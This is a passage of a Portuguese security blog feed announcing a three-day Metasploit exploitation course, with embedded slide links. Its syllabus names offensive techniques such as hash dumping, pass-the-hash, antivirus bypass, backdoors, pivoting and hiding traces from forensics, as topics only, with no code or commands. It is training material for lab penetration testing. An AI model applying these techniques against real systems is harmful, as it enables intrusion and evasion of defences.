White/Black Hats and Practice"&gt;Current Threads, White/Black Hats and Practice&lt;/a&gt;&lt;/strong&gt; &lt;object height="355" id="__sse5544503" width="425"&gt; &lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=palestra-101024112637-phpapp02&amp;amp;stripped_title=palestra-5544503&amp;amp;userName=robertoespreto" /&gt; &lt;param name="allowFullScreen" value="true"/&gt; &lt;param name="allowScriptAccess" value="always"/&gt; &lt;embed name="__sse5544503" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=palestra-101024112637-phpapp02&amp;amp;stripped_title=palestra-5544503&amp;amp;userName=robertoespreto" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt; &lt;/object&gt; &lt;div style="padding: 5px 0pt 12px;"&gt; View more &lt;a href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/robertoespreto"&gt;Roberto Soares (espreto)&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href=""&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=""&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div id="__ss_7317985" style="width: 425px;"&gt; &lt;strong style="display: block; margin: 12px 0pt 4px;"&gt;&lt;a href="http://www.slideshare.net/robertoespreto/slide-curso-metasploit" title="Slide curso metasploit"&gt;Slide curso metasploit&lt;/a&gt;&lt;/strong&gt; &lt;object height="355" id="__sse7317985" width="425"&gt; &lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=slidecursometasploit-110319124226-phpapp01&amp;amp;stripped_title=slide-curso-metasploit&amp;amp;userName=robertoespreto" /&gt; &lt;param name="allowFullScreen" value="true"/&gt; &lt;param name="allowScriptAccess" value="always"/&gt; &lt;embed name="__sse7317985" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=slidecursometasploit-110319124226-phpapp01&amp;amp;stripped_title=slide-curso-metasploit&amp;amp;userName=robertoespreto" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt; &lt;/object&gt; &lt;div style="padding: 5px 0pt 12px;"&gt; View more &lt;a href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/robertoespreto"&gt;Roberto Soares (espreto)&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Em breve postarei os slides das paletras e treinamentos mais recentes.&lt;br /&gt;&lt;br /&gt;Att,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-8908081545274964563?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/8908081545274964563/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/03/slides-andradinasp.html#comment-form' title='2 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8908081545274964563'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/8908081545274964563'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/03/slides-andradinasp.html' title='Slides - Andradina/SP'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-2275809572270384791</id><published>2011-01-20T17:51:00.003-02:00</published><updated>2011-04-08T13:24:33.111-03:00</updated><title type='text'>Treinamento Metasploit Exploitation</title><content type='html'>&lt;h1 align="center" style="text-align: center;"&gt;&lt;span style="font-size: 38pt;"&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 align="center" style="text-align: center;"&gt;&lt;span style="color: red; font-size: 38pt;"&gt;Treinamento&lt;/span&gt;&lt;/h1&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red; font-family: Cambria,serif; font-size: 38pt;"&gt;Metasploit Exploitation&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: #365f91; font-family: Cambria,serif; font-size: 36pt;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;br /&gt;&lt;b&gt;(update - 08/04/2011)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: black; font-family: Cambria,serif; font-size: 14pt;"&gt;Abril 2011&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Metasploit é um verdadeiro canivete suíço presente no arsenal de um penetration tester. É um framework com muitas capacidades diferentes e espetaculares.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;A comunidade em geral (usuários, desenvolvedores, hackers, etc...) contribui em peso em seu desenvolvimento e manutenção. Além do vasto número de exploits já incorporados em sua base e atualizados diariamente.&amp;nbsp; O framework pode ser utilizado para o desenvolvimento de novos exploits, fuzzing e o que sua imaginação permitir. Muitos profissionais de segurança não conhecem os recursos avançados que o framework oferece, em que o uso facilita muito em determinados testes.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Este curso visa proporcionar um conhecimento aprofundado de vários recursos presentes no framework que devem ser usados em um teste de intrusão ou em uma análise de vulnerabilidades com maior eficácia. O curso tem ênfase na prática, ou seja, mãos na massa, mas a teoria não será deixada de lado, além de saber explorar, você também entenderá de maneira fácil, o que está fazendo.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Os participantes passarão a ter uma compreensão melhor, não apenas dos aspectos técnicos de segurança, mas também experiência prática essencial, bem como aprender a aplicar corretamente o conhecimento adquirido de forma ética.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;O número de alunos será limitado a 10 participantes, a fim de assegurar um aprendizado eficaz.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif; font-size: 14pt;"&gt;Diferencial:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Conhecimento aprofundado através de exercícios práticos em características pouco exploradas, mas extremamente úteis para um penetration tester presentes no framework.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Estudos de problemas que possam aparecer ao utilizar determinadas particularidades do framework para que se possa obter uma melhor qualidade nos resultados.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Com um laboratório especialmente criado próximo do real, utilizaremos o conhecimento obtido durante o curso e aplicamos em nosso alvo. Os participantes terão que procurar as falhas, explorá-las, usar o raciocínio lógico para desvendar alguns desafios e documentar os resultados de uma forma abrangente.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif; font-size: 16pt;"&gt;Ementa:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif;"&gt;Metasploit 0x100 – Dia 1&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Discutir os aspectos introdutórios de como realizar testes de intrusão, a necessidade de testes regularmente, como estruturar, planejar e não perder o foco. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Realizar exercícios práticos em nosso ambiente virtual, com exploração aos recursos básicos e principais presentes no framework metasploit a fim de nivelar o conhecimento de todos os participantes. Avaliar o laboratório a procura de vulnerabilidades e analisar os resultados cuidadosamente para diminuir os falsos positivos, e assim realizar um teste mais eficaz. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Dissecar a rede com o uso de sniffers para visualizar o tráfego gerado no momento da exploração. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Realizar a exploração de uma máquina Windows, já que a mesma detém boa fatia do mercado de sistemas operacionais. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Usar os recursos avançados de exploits e payloads, e discutir como minimizar os erros que possam aparecer durante a execução de exploits em nosso alvo. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Seguem os tópicos abordados:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Creating Lab for Testings.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Introduction Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Recon and Scanning with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Exercise: Finding vulnerabilities in Hack Training Lab.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Import Nessus/OpenVAS and Nmap scans.&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;db_autopwn.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Enumeration Services.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;DNS/SSH Tunneling. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking Machines Windows. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Meterpreter.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Dissecting with Wireshark and Tcpdump.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;Dumping Password Hashes.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pass-the-hash with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Sniffing.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Advanced Exploits and Payload options.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Evasion Techniques.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking W2k Server.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-family: Cambria,serif;"&gt;Metasploit 0x200 – Dia 2&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&amp;nbsp;Abordar recursos mais avançados presentes no framework. Técnicas para se burlar anti-virus. Criar payloads customizados. Realizar uma profunda abordagem sobre a pós-exploração de um alvo, ou seja, o que fazer após ganhar uma shell meterpreter, como continuar explorando outras máquinas na rede interna, realizar a escalada de privilégios local tanto em ambiente Windows quanto em ambiente linux. Utilizar toda a capacidade que o meterpreter proporciona e também criar nossos próprios scripts. Explorar comandos desconhecidos do ambiente Windows e levantar o maior número possível de informações presentes, já que nem sempre é possível ter uma Shell meterpreter disponível. Tentar dificultar o trabalho da perícia forense encobrindo rastros dentro do sistema comprometido. Analisar a exploração de servidores de banco de dados e injetar comandos para que nos sejam retornados informações preciosas, dando-nos a possibilidade de acesso total ao servidor. Conhecer algumas ferramentas que se integram ao metasploit e que também possam ajudar no processo de intrusão. Seguem os tópicos abordados:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Client-Side Exploitation.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Bypassing Anti-Virus with Metasploit.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Creating .exe, .vbs e Java Payloads.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Encoding Payloads.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Bypassing Anti-Virus.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Working with Meterpreter Scripts.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Smb_relay.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Backdoors.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Advanced &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pivoting.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Internals &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Commands Windows.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Exploration others internal machines in Hack Training Lab.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Timestomp.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;SQLMap Integration.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: Attacking Databases.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;The Social Engineering Toolkit (SET).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Browser AutoPwn.&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt; &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Introduction Metasploit Pro.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Armitage. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Exercise: &lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Attacking Linux.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif;"&gt;Metasploit 0x300 – Dia 3&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif;"&gt;&amp;nbsp;Avaliação prática e escrita:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Prática - Os participantes demonstrarão todo conhecimento adquirido no curso em uma infra-estrutura virtual criada especialmente para o Capture the Flag, para consolidação dos conhecimentos sobre o framework Metasploit. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Escrita - Registro de todo o processo de busca a pontos de vunerabilidade.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Segue tópico abordado:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Capture the Flag.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Requisitos Mínimos:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Conhecimento em redes de computadores (TCP/IP), conhecimentos em linha de comando do linux/windows e base mínima no framework Metasploit. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Graduandos em computação;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Pesquisadores;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Penetration Tester que queiram melhorar seus conhecimentos no framework;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Entusiastas em segurança;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Symbol;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Etc…&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span lang="EN-US" style="font-family: Cambria,serif; font-size: 16pt;"&gt;Infra-estrutura oferecida:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;Apostila;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;DVD com Backtrack 4 R2;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New Roman';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: Calibri,sans-serif;"&gt;DVD com distribuição vulnerável para testes;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang="EN-US" style="font-family: Wingdings;"&gt;&lt;span style="font: 7pt 'Times New 